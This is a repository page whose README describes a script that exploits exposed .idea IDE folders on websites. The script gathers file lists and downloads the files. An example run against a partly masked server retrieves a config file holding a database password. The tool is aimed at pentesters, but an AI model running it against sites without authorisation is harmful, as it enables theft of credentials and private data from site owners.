# idea_exploit **Repository Path**: huang_bai/idea_exploit ## Basic Information - **Project Name**: idea_exploit - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-12-17 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # **.idea disclosure exploit** A script use **.idea** folder to gather sensitive information for pentesters . Websites not correctly deployed let their IDE config folder (**.idea**) exposed to hacker, which can lead password or archived data files leaked. The scanner will try to download all files, please recheck local files by yourself. ## Requirements ``` pip install lxml requests ``` ## Example Our scanner reported a vulnerability this afternoon ![scanner_pannel](images/scanner_pannel.png) As you can see, the file **DbConnCfg.json** leaked db password. ``` D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/ [+] Module name is {mask} [+] Type is web_module [+] About 67 urls to process [200] /cfg/DbConnCfg.json [200] /bi/applepay/comm.php [200] /bi/applepay/ipn_ios.php [404] /auth/auth_ios/auth_guest.php ... [200] /ver/ver_util.php All files saved to 107.{mask}.{mask}.151/idea_exp_report.html ``` ![contain_password](images/contain_password.png)